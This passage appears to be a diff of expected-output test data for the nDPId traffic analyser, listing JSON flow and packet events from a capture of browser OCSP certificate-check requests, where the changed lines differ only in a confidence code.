{"hostname":"r3.o.lencr.org","url":"r3.o.lencr.org\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":110,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623223090984,"flow_last_seen":1623223090984,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623223090984,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1623223090984,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623223090984,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8WOFAAEAGCBnAqAGAl4uADoYQAFC9BO7MAAAAAKAC+vBq5AAAAgQFtAQCCArLCQstAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAABk1G4o"} 00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1623223091009,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623223091009,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADAGcPqXi4AOwKgBgABQhhCFN\/R2vQTuzaAS\/ohuswAAAgQFtAQCCAoBgn1XywkLLQEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADKwfqN"} 00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1623223091014,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623223091014,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0WOJAAEAGCCDAqAGAl4uADoYQAFC9BO7NhTf0d4AQAfaZ9AAAAQEICssJC0sBgn1XGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZwg24A=="} -00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623223090984,"flow_last_seen":1623223091014,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1623223091014,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34320,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"geant.ocsp.sectigo.com","url":"geant.ocsp.sectigo.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} +00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623223090984,"flow_last_seen":1623223091014,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":393,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1623223091014,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34320,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"geant.ocsp.sectigo.com","url":"geant.ocsp.sectigo.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623223091709,"flow_last_seen":1623223091709,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623223091709,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34340,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1623223091709,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623223091709,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8XL5AAEAGBDzAqAGAl4uADoYkAFDUes8oAAAAAKAC+vBwKQAAAgQFtAQCCArLCQ4CAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAACb3tkC"} 00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1623223091736,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623223091736,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAAC8GcfqXi4AOwKgBgABQhiREDjpk1HrPKaAS\/\/+ohwAAAgQFtAQCCAp7mshzywkOAgEDAwgZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAvlhtb"} 00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1623223091739,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623223091739,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0XL9AAEAGBEPAqAGAl4uADoYkAFDUes8pRA46ZYAQAfbVQAAAAQEICssJDiB7mshzGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApa33FQ=="} -00833{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623223091709,"flow_last_seen":1623223091739,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1623223091739,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34340,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.usertrust.com","url":"ocsp.usertrust.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} -00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":128,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1623222785863,"flow_last_seen":1623222909833,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":889,"flow_tot_l4_payload_len":2550,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1623223091773,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"92.122.95.235","src_port":43728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} -00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":128,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1623222699655,"flow_last_seen":1623222892672,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":702,"flow_tot_l4_payload_len":2192,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1623223091773,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.184.99","src_port":54154,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Cloud"}} +00833{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623223091709,"flow_last_seen":1623223091739,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1623223091739,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34340,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.usertrust.com","url":"ocsp.usertrust.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":128,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1623222785863,"flow_last_seen":1623222909833,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":889,"flow_tot_l4_payload_len":2550,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1623223091773,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"92.122.95.235","src_port":43728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} +00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":128,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1623222699655,"flow_last_seen":1623222892672,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":702,"flow_tot_l4_payload_len":2192,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1623223091773,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.184.99","src_port":54154,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Cloud"}} 00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":158,"source":"ocsp.pcapng","alias":"nDPId-test","packets-captured":158,"packets-processed":157,"total-skipped-flows":0,"total-l4-payload-len":15999,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":5,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":32,"global_ts_msec":1623226796047} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623226796047,"flow_last_seen":1623226796047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623226796047,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"93.184.220.29","src_port":47904,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1623226796047,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623226796047,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8IiFAAEAGHJ3AqAGAXbjcHbsgAFDKwHZTAAAAAKAC+vANzwAAAgQFtAQCCArJnn0eAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC2uJMq"} 00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1623226796050,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623226796050,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8OIIAADgGTjxduNwdwKgBgABQuyB0cdYZysB2VKAS\/\/931wAAAgQFtAQCCAqXTK79yZ59HgEDAwkZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApvHVR"} 00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1623226796054,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623226796054,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0IiJAAEAGHKTAqAGAXbjcHbsgAFDKwHZUdHHWGoAQAfakpwAAAQEICsmefSaXTK79GYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA5srZww=="} -00830{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623226796047,"flow_last_seen":1623226796057,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":387,"flow_tot_l4_payload_len":387,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1623226796057,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"93.184.220.29","src_port":47904,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.digicert.com","url":"ocsp.digicert.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} -00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":165,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1623223090984,"flow_last_seen":1623223156084,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":728,"flow_tot_l4_payload_len":1592,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1623226796065,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} -00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":165,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1623223091709,"flow_last_seen":1623223156800,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1306,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1623226796065,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34340,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} +00830{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623226796047,"flow_last_seen":1623226796057,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":387,"flow_tot_l4_payload_len":387,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1623226796057,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"93.184.220.29","src_port":47904,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.digicert.com","url":"ocsp.digicert.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} +00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":165,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1623223090984,"flow_last_seen":1623223156084,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":728,"flow_tot_l4_payload_len":1592,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1623226796065,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} +00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":165,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1623223091709,"flow_last_seen":1623223156800,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":1306,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1623226796065,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.139.128.14","src_port":34340,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} 00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":208,"source":"ocsp.pcapng","alias":"nDPId-test","packets-captured":208,"packets-processed":207,"total-skipped-flows":0,"total-l4-payload-len":19557,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":6,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":40,"global_ts_msec":1623227471703} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623227471703,"flow_last_seen":1623227471703,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623227471703,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.85.15.92","src_port":49382,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1623227471703,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623227471703,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8CDlAAEAGLKrAqAGANFUPXMDmAFDpM3mLAAAAAKAC+vAljwAAAgQFtAQCCArD2jnWAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAU0JsT"} 00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1623227471715,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623227471715,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8PJoAAPMGhUg0VQ9cwKgBgABQwOYt\/4+26TN5jKAS\/\/9VQwAAAgQFoAQCCAoCPQtLw9o51gEDAwkZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAABrMGLg"} 00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1623227471719,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623227471719,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0CDpAAEAGLLHAqAGANFUPXMDmAFDpM3mMLf+Pt4AQAfaB9gAAAQEICsPaOecCPQtLGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYY2fOA=="} -00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":211,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623227471703,"flow_last_seen":1623227471719,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":396,"flow_tot_l4_payload_len":396,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1623227471719,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.85.15.92","src_port":49382,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.sca1b.amazontrust.com","url":"ocsp.sca1b.amazontrust.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} +00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":211,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623227471703,"flow_last_seen":1623227471719,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":396,"flow_tot_l4_payload_len":396,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1623227471719,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.85.15.92","src_port":49382,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.sca1b.amazontrust.com","url":"ocsp.sca1b.amazontrust.com\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623227472211,"flow_last_seen":1623227472211,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623227472211,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.2.133","src_port":59922,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1623227472211,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623227472211,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8cDxAAEAGbm3AqAGAl2UCheoSAFClxR9VAAAAAKAC+vA6IAAAAgQFtAQCCApcSasVAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAbRut"} 00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1623227472214,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623227472214,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADYG6KmXZQKFwKgBgABQ6hJzFOMDpcUfVqAS\/\/9zqQAAAgQFTAQCCAoCSmlaXEmrFQEDAwkZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkey68"} 00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1623227472218,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623227472218,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0cD1AAEAGbnTAqAGAl2UCheoSAFClxR9WcxTjBIAQAfagEQAAAQEIClxJqx0CSmlaGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyyO91A=="} -00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":218,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623227472211,"flow_last_seen":1623227472219,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":401,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1623227472219,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.2.133","src_port":59922,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.globalsign.com","url":"ocsp.globalsign.com\/gsrsaovsslca2018","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} 